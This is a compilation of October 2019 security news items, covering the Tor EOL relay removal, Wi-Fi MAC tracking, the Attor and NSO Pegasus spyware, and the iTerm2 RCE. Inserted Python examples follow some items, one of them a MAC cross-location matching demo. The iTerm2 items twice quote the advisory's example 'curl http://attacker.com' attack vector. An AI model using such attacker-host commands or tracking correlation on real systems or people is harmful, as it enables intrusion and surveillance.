Phishing Attack Possibly Affected 68K Patients of The Methodist Hospitals

The Methodist Hospitals, Inc. revealed that a phishing attack potentially affected the information of approximately 68,000 patients. According to its Notice of Data Incident, the non-profit healthcare system located in Gary, Indiana detected unusual activity involving an employee’s email account back in June 2019. The Methodist Hospitals (‘Methodist’) responded by launching an investigation into what […]

The post Phishing Attack Possibly Affected 68K Patients of The Methodist Hospitals appeared first on The State of Security.

Tor Project is going to remove End-Of-Life relays from the network

Maintainers at the Tor Project have removed from the network more than 800 relay servers running outdated and EOL versions of the Tor software.

Currently, the Tor network is composed of more than 6000 relays, some of them running outdated Tor software versions (in some cases as old as the 0.2.4.x series). Other relays run the latest Tor software in nightly builds and alpha releases. Maintainers of the Tor Project announced that they have removed relay servers running outdated and EOL versions of the Tor software.

Tor Project experts pointed out that they currently maintain only 5 Tor version series: 0.2.9.x (LTS), 0.3.5.x (LTS), 0.4.0.x, 0.4.1.x and 0.4.2.x (stable on Dec 15th, 2019).

The maintainers announced that they have removed roughly 13.5% of the relay servers: 750 acting as Tor middle relays and 62 as exit relays.

The presence of End-Of-Life relays in the Tor network has multiple negative impacts on network stability and security. It also complicates maintenance, because important fixes and new features cannot easily be rolled out to them.

“In the past weeks, we’ve taken steps to contact every relay operator with a valid ContactInfo field to ask them to upgrade to the latest stable release. The Tor relay community was informed via the tor-relays mailing list on September 3rd 2019 of this upcoming change.” reads the announcement published by the Tor Project.

“The End-Of-Life relays in the network currently make up just over 12% of the total bandwidth, or around 750 relays. Out of these, only 62 are Exit relays accounting for only 1.68% of the total Exit traffic. We expect a minor impact on the size of the network, and a small drop in the Metrics graph.”

The maintainers expect a new Tor stable release in November that will reject End-Of-Life relays by default. Until then, they will reject obsolete relays by fingerprint.

Instructions for upgrading End-Of-Life relays are included in the announcement.
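The classification the announcement describes, as an added example that is not the Tor Project's or the article's code: parse a few network-status entries in the r/s/v/w line shape a consensus uses, check each relay's version against the five maintained series listed above, and report how many relays, how many exits and what share of bandwidth would be rejected as End-Of-Life. The series list comes from the article; the sample relays (nicknames, fingerprints, addresses, bandwidth weights) are constructed placeholders, and a relay with no parseable version is treated as End-Of-Life.

```python
import re

# The five maintained series named in the article (0.2.9.x, 0.3.5.x, 0.4.0.x,
# 0.4.1.x, 0.4.2.x). Any relay outside these is treated as End-Of-Life.
SUPPORTED_SERIES = {"0.2.9", "0.3.5", "0.4.0", "0.4.1", "0.4.2"}

# Constructed sample in the shape of consensus router entries. Nicknames,
# fingerprints, addresses and bandwidth weights are placeholders, not real relays.
SAMPLE_CONSENSUS = """\
r relayA AAAAAAAAAAAAAAAAAAAAAAAAAAA 2019-10-10 01:00:00 203.0.113.10 9001 0
s Fast Guard Running Stable Valid
v Tor 0.4.1.6
w Bandwidth=12000
r relayB BBBBBBBBBBBBBBBBBBBBBBBBBBB 2019-10-10 01:00:00 203.0.113.11 9001 0
s Exit Fast Running Valid
v Tor 0.2.4.27
w Bandwidth=3000
r relayC CCCCCCCCCCCCCCCCCCCCCCCCCCC 2019-10-10 01:00:00 203.0.113.12 443 0
s Fast Running Valid
v Tor 0.3.5.8
w Bandwidth=5000
r relayD DDDDDDDDDDDDDDDDDDDDDDDDDDD 2019-10-10 01:00:00 203.0.113.13 9001 0
s Exit Fast Running Valid
v Tor 0.4.2.2-alpha
w Bandwidth=4000
r relayE EEEEEEEEEEEEEEEEEEEEEEEEEEE 2019-10-10 01:00:00 203.0.113.14 9001 0
s Fast Running Valid
v Tor 0.3.4.11
w Bandwidth=1000
"""


def parse_relays(document):
    """Group r/s/v/w lines into one record per relay."""
    relays, current = [], None
    for line in document.splitlines():
        parts = line.split()
        if not parts:
            continue
        keyword = parts[0]
        if keyword == "r":
            current = {"nick": parts[1], "flags": set(), "version": None, "bw": 0}
            relays.append(current)
        elif current is None:
            continue  # ignore anything before the first router entry
        elif keyword == "s":
            current["flags"] = set(parts[1:])
        elif keyword == "v" and len(parts) >= 3 and parts[1] == "Tor":
            current["version"] = parts[2]
        elif keyword == "w":
            for kv in parts[1:]:
                if kv.startswith("Bandwidth="):
                    current["bw"] = int(kv.split("=", 1)[1])
    return relays


def version_series(version):
    """'0.4.2.2-alpha' -> '0.4.2'; None when the version is missing or malformed."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version or "")
    return ".".join(match.groups()) if match else None


def is_eol(version):
    return version_series(version) not in SUPPORTED_SERIES


def eol_report(relays):
    """Counts and bandwidth shares of the relays that would be rejected."""
    total_bw = sum(r["bw"] for r in relays) or 1
    exit_bw = sum(r["bw"] for r in relays if "Exit" in r["flags"]) or 1
    eol = [r for r in relays if is_eol(r["version"])]
    eol_exits = [r for r in eol if "Exit" in r["flags"]]
    return {
        "eol_count": len(eol),
        "eol_exit_count": len(eol_exits),
        "eol_bw_share": round(sum(r["bw"] for r in eol) / total_bw * 100, 2),
        "eol_exit_bw_share": round(sum(r["bw"] for r in eol_exits) / exit_bw * 100, 2),
        "eol_nicks": sorted(r["nick"] for r in eol),
    }


if __name__ == "__main__":
    for key, value in eol_report(parse_relays(SAMPLE_CONSENSUS)).items():
        print(f"{key}: {value}")
```

The bandwidth and exit-share figures are the same quantities the announcement quotes (share of total bandwidth, share of exit traffic), so the report can be rerun against a real consensus to track the effect of a rejection policy over time.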

Pierluigi Paganini

(SecurityAffairs – Tor, privacy)

The post Tor Project is going to remove End-Of-Life relays from the network appeared first on Security Affairs.

2FA, HTTPS and private browsing still a mystery to most Americans

Most US adults know what phishing scams are and where they occur, what browser cookies do, and that advertising is the largest source of revenue for most social media platforms, a recent Pew Research Center survey aimed at testing Americans’ digital knowledge has revealed. But, sadly, it has also shown that most respondents don’t know what https:// means, what the private browsing option does, that WhatsApp and Instagram are owned by Facebook, and can’t identify …

The post 2FA, HTTPS and private browsing still a mystery to most Americans appeared first on Help Net Security.

Wi-Fi Hotspot Tracking

Free Wi-Fi hotspots can track your location, even if you don't connect to them. This is because your phone or computer broadcasts a unique MAC address.

What distinguishes location-based marketing hotspot providers like Zenreach and Euclid is that the personal information you enter in the captive portal -- like your email address, phone number, or social media profile -- can be linked to your laptop or smartphone's Media Access Control (MAC) address. That's the unique alphanumeric ID that devices broadcast when Wi-Fi is switched on.

As Euclid explains in its privacy policy, "...if you bring your mobile device to your favorite clothing store today that is a Location -- and then a popular local restaurant a few days later that is also a Location -- we may know that a mobile device was in both locations based on seeing the same MAC Address."

MAC addresses alone don't contain identifying information besides the make of a device, such as whether a smartphone is an iPhone or a Samsung Galaxy. But as long as a device's MAC address is linked to someone's profile, and the device's Wi-Fi is turned on, the movements of its owner can be followed by any hotspot from the same provider.

"After a user signs up, we associate their email address and other personal information with their device's MAC address and with any location history we may previously have gathered (or later gather) for that device's MAC address," according to Zenreach's privacy policy.

The defense is to turn Wi-Fi off on your phone when you're not using it.

EDITED TO ADD: Note that the article is from 2018. Not that I think anything is different today....
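To make the linking described above concrete, here is an added example (not code from the post or from either provider): it normalises MAC addresses as a captive portal might log them, decodes the two flag bits of the first octet that tell a stable vendor-assigned address apart from a locally administered one (the kind a phone uses when it randomises its Wi-Fi address), and then shows which addresses in a constructed set of sightings would be seen at more than one location. The sightings, addresses and location names are all constructed; the OUI prefix is a placeholder and no vendor lookup is attempted.

```python
import re


def normalise_mac(mac):
    """Accept 'AC:DE:48:00:00:80', 'ac-de-48-00-00-80' or Cisco-style
    'acde.4800.0080' and return the canonical upper-case colon form."""
    if not re.fullmatch(r"[0-9A-Fa-f:.\-]+", mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    digits = re.sub(r"[:.\-]", "", mac)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(digits[i:i + 2].upper() for i in range(0, 12, 2))


def describe_mac(mac):
    """Decode the flag bits of the first octet: the I/G bit (multicast) and the
    U/L bit (locally administered, i.e. not a vendor-assigned, burned-in address).
    Randomised Wi-Fi addresses set the U/L bit; a burned-in address has it clear."""
    canon = normalise_mac(mac)
    first_octet = int(canon[:2], 16)
    locally_administered = bool(first_octet & 0x02)
    multicast = bool(first_octet & 0x01)
    return {
        "mac": canon,
        # Vendor prefix; mapping it to a maker needs the IEEE registry (not included here).
        "oui": canon[:8],
        "locally_administered": locally_administered,
        "multicast": multicast,
        # A stable vendor-assigned unicast address is what a provider can tie to a profile.
        "stable_identifier": not locally_administered and not multicast,
    }


# Constructed captive-portal sightings: (location, MAC as the portal logged it).
# AC:DE:48 is used purely as a placeholder prefix; the DA:... addresses are
# shaped like per-network randomised MACs. None of these are real devices.
SIGHTINGS = [
    ("clothing-store", "AC:DE:48:00:00:80"),
    ("restaurant", "ac-de-48-00-00-80"),      # same device, differently formatted
    ("clothing-store", "DA:A1:19:3C:7E:01"),  # randomised MAC on network 1
    ("restaurant", "DA:A1:19:9F:02:B3"),      # same phone, fresh random MAC on network 2
    ("restaurant", "AC:DE:48:00:00:81"),      # a different burned-in device, seen once
]


def cross_location_matches(sightings):
    """MACs seen at more than one location: the raw material for a movement
    history. Per-network randomised MACs never match across locations."""
    seen = {}
    for location, mac in sightings:
        seen.setdefault(normalise_mac(mac), set()).add(location)
    return {mac: sorted(locs) for mac, locs in seen.items() if len(locs) > 1}


if __name__ == "__main__":
    for mac, locations in cross_location_matches(SIGHTINGS).items():
        print(mac, describe_mac(mac), locations)
```

Running it shows only the burned-in address surviving the cross-location match, which is why a randomised per-network address limits this kind of tracking while Wi-Fi is on; turning Wi-Fi off, as the post recommends, removes the broadcast entirely.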

Coleen Rooney and Rebekah Vardy in Public Spat Over ‘Leaked Stories’

Reports emerged yesterday that Coleen Rooney, wife of professional footballer Wayne Rooney, publicly accused Rebekah Vardy, wife of footballer Jamie Vardy, of leaking personal information about her to tabloid newspaper The Sun. Vardy was quick to refute the claims.

In a lengthy social media post on October 9, Rooney wrote: “For a few years now someone I trusted to follow me on my personal Instagram account has been consistently informing THE SUN newspaper of my private posts and stories.”

She went on to claim that “there has been so much information given to them about me, my friends and my family – all without my permission or knowledge.”

In an attempt to find out who was responsible, Rooney explained how she blocked all users from viewing her Instagram stories, except for one person, and spent five months posting a series of false stories to see if they ended up being leaked to The Sun, which they eventually did.

“Now I know for certain which account/individual it’s come from,” Rooney continued. “I have saved and screenshotted all the original stories which clearly show just one person has viewed them. It’s………Rebekah Vardy’s account.”

In response, Vardy tweeted to deny any knowing involvement in the issue, suggesting there could have been some sort of unaccounted-for activity on her Instagram account which may have led to the leaks: “I never speak to anyone about this [personal stories and information] as various journalists have asked me to over the years can vouch for.

“Over the years various people have had access to my insta & just this week I found I was following people I didn’t know and have never followed myself.

“If you thought this was happening you could have told me & I could have changed my passwords to see if it stopped.”

Researchers Discover Spy Platform with GSM Fingerprinting

Researchers at ESET have discovered several high-profile espionage attacks aimed at government and diplomatic entities in Eastern Europe.

According to the analysis, the attacks were conducted using a previously unreported cyber-espionage platform, which is notable for its modular architecture, along with two prominent features: the AT protocol used by one of its plugins for GSM fingerprinting, and Tor, which is employed for its network communications. Given these features, ESET researchers have named the platform Attor.

“The attackers who use Attor are focusing on diplomatic missions and governmental institutions,” said Zuzana Hromcová, ESET malware researcher. “These attacks, ongoing since at least 2013, are highly targeted at users of these Russian services, specifically those who are concerned about their privacy.”

ESET explained that Attor consists of a dispatcher and loadable plugins that rely on the dispatcher for basic functionality. The plugins are delivered to the compromised computer as encrypted DLLs and are only fully recovered in memory. “As a result, without access to the dispatcher, it is difficult to obtain Attor’s plugins and to decrypt them,” added Hromcová.

The platform targets specific processes, including processes associated with Russian social networks and some encryption/digital signature utilities.

Among Attor’s capabilities implemented by its plugins, two stand out for their uncommon features: network communication and the fingerprinting of GSM devices.

Attor’s infrastructure for C&C communications spans four components – the dispatcher providing encryption functions and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication. “This mechanism makes it impossible to analyze Attor’s network communication unless all the pieces of the puzzle have been collected,” explained Hromcová.

“Fingerprinting a device can serve as a base for further data theft. If the attackers learn about the type of connected device, they can craft and deploy a customized plugin that would be able – using AT commands – to steal data from that device and make changes in it, including changing the device’s firmware,” concluded Hromcová.

NCSC announces major change to the Cyber Essentials scheme

Over the past five years, the Cyber Essentials scheme has been vital in helping protect organisations from some of the most common causes of data breaches.

However, the NCSC (National Cyber Security Centre) has announced a change to the way the scheme is run. From April 2020, the five Cyber Essentials accreditation bodies will be replaced by one, the IASME Consortium.

There will be a transition period, with the current scheme operating as normal until 31 March 2020.

After that date, new applications will be handled under the revised Cyber Essentials scheme through the IASME Consortium. Organisations still in the process of seeking certification will have until 30 June 2020 to complete their application.

Does this affect IT Governance?

In support of this change, IT Governance will become an IASME-accredited certification body from April next year.

We will continue to provide the high level of cost-effective ongoing service our clients expect from us and will ensure the transition to the new arrangements is seamless.

In the meantime, and in line with current arrangements supported by the NCSC, our clients will continue to be certified under CREST, and all existing and new certifications will continue to be valid and in line with current requirements.

You can find out more about Cyber Essentials and the ways IT Governance can help you certify on our website.

The post NCSC announces major change to the Cyber Essentials scheme appeared first on IT Governance Blog.

Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group’s surveillance spyware made the headlines again; this time the malware was used to spy on 2 rights activists in Morocco, according to Amnesty International.

Amnesty International collected evidence of new abuses of NSO Group’s surveillance spyware: this time the malware was used to spy on 2 rights activists in Morocco.

Experts at Amnesty International analyzed the devices of Abdessadak El Bouchattaoui and confirmed that he was targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was used to spy on Maati Monjib. The rights group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and HRD; in February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the Hirak El-Rif social justice protests of 2016 and 2017. Monjib is a historian and columnist, and co-founder of the NGO Freedom, which in 2015 was accused of threatening the internal security of the state “through propaganda.”

NSO Group Pegasus

The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that, once clicked by the victims, would start the attack chain allowing the attacker to remotely control the device.

The links used in these attacks are similar to the ones detected in June 2018 by Amnesty International in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance.”

NSO Group rejects the accusations and claims that its surveillance technology is only used for lawful purposes.

In May, Amnesty International filed a lawsuit against Israeli surveillance firm NSO; the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization is calling on the Israeli Ministry of Defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Pierluigi Paganini

(SecurityAffairs – NSO Group, hacking)

The post Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware appeared first on Security Affairs.

Hashtag Trending- You need to install this Windows update; macOS upgrade woes; Twitter phone number mess

Microsoft asks users to install a critical patch once again, Apple macOS Catalina messes up music tools, Twitter uses authentication phone numbers to create ads. That’s all the tech news that’s trending today. It’s Thursday, Oct. 10th, and I’m your host, Tom Li. First, trending on Google, Microsoft is urging users to install a critical…

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will …

The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.

Smashing Security #149: Falling in love with fraudsters

We take a trip to Staten Island, New York, to hear how a case of cyberstalking resulted in the arrest of 20 alleged mobsters, learn about the nude photo-loving insider threat at Yahoo, and discover how fraudsters might be boosting Match.com’s profits.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by Graham Cluley and Carole Theriault, joined this week by Ran Levi of “Malicious Life.”

#DTXEurope: Defense Now Far Harder Than Attack, Warns Security Researcher

At Digital Transformation EXPO Europe, Samy Kamkar, independent security researcher and creator of the ‘Samy’ MySpace computer worm, reflected upon the current cyber-threat landscape and warned that defenders are being challenged to a far greater degree than ever before.

That’s because of the ever-increasing numbers of internet-connected devices being used across the world, extremely high levels of information being shared online and the extremely sophisticated technology cyber-criminals now adopt in their attacks.

“Security is challenging,” Kamkar said. “It’s very difficult to secure everything and as somebody who is trying to defend, you have maybe 100 holes and maybe you can cover 99 of them. For an attacker it’s much easier, you only need to find one problem, one hole to break in.”

So attacks are now very difficult to stop, he added, and that’s because they are now possible to carry out “with low cost tools – tools that even you and I can purchase, with open source software and hardware that anyone can access.”

Staying secure is therefore not easy, Kamkar warned, but he said there are three fundamental steps that can be taken to make better security more achievable.

The first “is using two-factor authentication wherever you can.”

Next, “do not use SMS two-factor authentication. The SMS network is like your local area network – anyone with access can essentially take over any phone number. Do not use SMS if you have the ability to use something like an authenticator or software on your mobile device.”

Lastly, “please use a password manager. There are pros and cons, and yes you are storing passwords in one place that’s centralized, but do anything [you can] to prevent you from using the same password over and over again, which is how all of the largest attacks I have ever seen occurred,” Kamkar concluded.

What is the ISO 27000 series of standards?

The ISO/IEC 27000 family of standards, also known as the ISO 27000 series, is a series of best practices to help organisations improve their information security.

Published by ISO (the International Organization for Standardization) and the IEC (International Electrotechnical Commission), the series explains how to implement an ISMS (information security management system).

An ISMS is a systematic approach to risk management, containing measures that address the three pillars of information security: people, processes and technology.

The series consists of 46 individual standards, including ISO 27000, which provides an introduction to the family as well as clarifying key terms and definitions.

You don’t need to know every standard inside out to understand how the series works, and some won’t be relevant to your organisation, but there are a few core ones that you should be familiar with.

ISO 27001

This is the central standard in the ISO 27000 series, containing the implementation requirements for an ISMS. This is important to remember, as ISO 27001 is the only standard in the series that organisations can be audited and certified against.

That’s because it contains an overview of everything you must do to achieve compliance, which is expanded upon in each of the following standards.

ISO 27002

This is a supplementary standard that discusses the information security controls that organisations might choose to implement.

Organisations are only required to adopt controls that they deem relevant – something that will become apparent during a risk assessment.

The controls are outlined in Annex A of ISO 27001, but whereas this is essentially a quick rundown, ISO 27002 contains a more comprehensive overview, explaining how each control works, what its objective is and how you can implement it.

ISO 27017 and ISO 27018

These standards were introduced in 2015, explaining how organisations should protect sensitive information in the Cloud. This has become especially important recently as organisations migrate much of their sensitive information on to online servers.

ISO 27017 is a code of practice, providing extra information about how to apply the Annex A controls to information stored in the Cloud.

Under ISO 27001, you have the choice to treat these as a separate set of controls. So, you’d pick a set of controls from Annex A for your ‘normal’ data and a set of controls from ISO 27017 for data in the Cloud.

ISO 27018 works in essentially the same way but with extra consideration for personal data.

ISO 27701

This is the newest standard in the ISO 27000 series, covering what organisations must do when implementing a PIMS (privacy information management system).

It was created in response to the GDPR (General Data Protection Regulation), which instructs organisations to adopt “appropriate technical and organisational measures” to protect personal data but doesn’t state how they should do that.

ISO 27701 fills that gap, essentially bolting privacy processing controls onto ISO 27001.

Why use an ISO 27000-series standard?

Information security breaches are one of the biggest risks that organisations face. Sensitive data is used across all areas of businesses these days, increasing its value for legitimate and illegitimate use.

Countless incidents occur every month, whether it’s cyber criminals hacking into a database or employees losing or misappropriating information. Wherever the data goes, the financial and reputational damage caused by a breach can be devastating.

That’s why organisations are increasingly investing heavily in their defences, using ISO 27001 as a guideline for effective security.

ISO 27001 can be applied to organisations of any size and in any sector, and the framework’s broadness means its implementation will always be appropriate to the size of the business.

You can find out how to get started with the Standard by reading Information Security & ISO 27001: An introduction.

This free green paper explains:

  • What ISO 27001 is, how an ISMS works and how it relates to ISO 27002;
  • The importance of risk assessments and risk treatment plans;
  • How the Standard helps you meet your legal and regulatory obligations; and
  • How to begin your ISMS implementation process.

The post What is the ISO 27000 series of standards? appeared first on IT Governance Blog.

Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012

Security experts discovered a critical remote code execution vulnerability, tracked as CVE-2019-9535, in the GPL-licensed iTerm2 macOS terminal emulator app.

Security experts at cybersecurity firm Radically Open Security (ROS) discovered a 7-year-old critical remote code execution vulnerability in the GPL-licensed iTerm2 macOS terminal emulator app.

The iTerm2 macOS terminal emulator app is one of the most popular open-source replacements for Mac’s built-in terminal app.

The RCE flaw tracked as CVE-2019-9535 was discovered as part of an independent security audit funded by the Mozilla Open Source Support Program (MOSS).

“A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.” reads the security advisory published by Mozilla. “During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.”

The RCE vulnerability resides in the tmux integration feature of iTerm2; it could be exploited by an attacker to execute arbitrary commands by providing malicious output to the terminal.

The experts published a video PoC that shows how to exploit the vulnerability by producing output to the terminal. Possible attack vectors would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.

“Typically, this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact,” Mozilla concludes.

iTerm2 version 3.3.6 addresses the flaw, which affects prior versions.
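The check a macOS administrator wants after reading this article and the Help Net Security summary above is whether the installed iTerm2 is at or above 3.3.6, the release the article names as the fix for CVE-2019-9535. Here is an added example (not code from iTerm2, ROS, Mozilla or the article) that reads CFBundleShortVersionString from the app bundle's Info.plist and compares it against 3.3.6, treating a pre-release build such as 3.3.6beta2 as older than the final 3.3.6. The install path /Applications/iTerm.app is the usual location and is an assumption; the embedded Info.plist fragment is constructed so the comparison can be exercised on any machine.

```python
import plistlib
import re
from pathlib import Path

FIXED_VERSION = "3.3.6"  # from the article: 3.3.6 addresses CVE-2019-9535
# Standard install location; an assumption, override if iTerm2 lives elsewhere.
ITERM_INFO_PLIST = Path("/Applications/iTerm.app/Contents/Info.plist")


def version_key(version):
    """Turn '3.3.7beta1' into a sortable key: ((3, 3, 7), False). The boolean
    marks a final release, so a beta of 3.3.6 sorts below 3.3.6 itself."""
    match = re.match(r"(\d+(?:\.\d+)*)(.*)$", version.strip())
    if not match:
        raise ValueError(f"unparseable version: {version!r}")
    numbers = tuple(int(x) for x in match.group(1).split("."))
    numbers += (0,) * max(0, 3 - len(numbers))  # pad '3.3' to (3, 3, 0)
    return numbers, match.group(2) == ""


def is_fixed(version):
    return version_key(version) >= version_key(FIXED_VERSION)


def version_from_plist(data):
    """Read CFBundleShortVersionString from the bytes of an Info.plist."""
    return plistlib.loads(data).get("CFBundleShortVersionString")


def installed_version(plist_path=ITERM_INFO_PLIST):
    """Version of the installed app, or None when the bundle is not at the assumed path."""
    if not plist_path.exists():
        return None
    return version_from_plist(plist_path.read_bytes())


def assess(version):
    if version is None:
        return "iTerm2 not found at the assumed path"
    status = "fixed" if is_fixed(version) else "VULNERABLE to CVE-2019-9535: upgrade"
    return f"iTerm2 {version}: {status}"


# Constructed Info.plist fragment for an offline run; not taken from any real bundle.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>CFBundleShortVersionString</key>
  <string>3.3.5</string>
</dict>
</plist>
"""

if __name__ == "__main__":
    print(assess(installed_version()))                      # the real installation, if present
    print(assess(version_from_plist(SAMPLE_INFO_PLIST)))    # the constructed sample
```

The same two functions can be pointed at any other bundle's Info.plist and fixed-version pair, which makes this a reusable pattern for fleet checks after an advisory names a fixed release.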

Pierluigi Paganini

(SecurityAffairs – iTerm2, hacking)

The post Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012 appeared first on Security Affairs.

Build or buy: What to consider when deploying on-premise or cloud-based PKI

Public Key Infrastructure (PKI), once considered an IT table stake, has transformed from a tool used to protect websites to a core digital identity management function within the cybersecurity framework. Today’s PKI establishes and manages digital identities across people, applications and devices within the enterprise. IT teams are deploying PKI to combat several growing cybersecurity threats too, from ransomware and phishing attacks to IoT device hijacking. PKI remains a core component within the larger IT …

The post Build or buy: What to consider when deploying on-premise or cloud-based PKI appeared first on Help Net Security.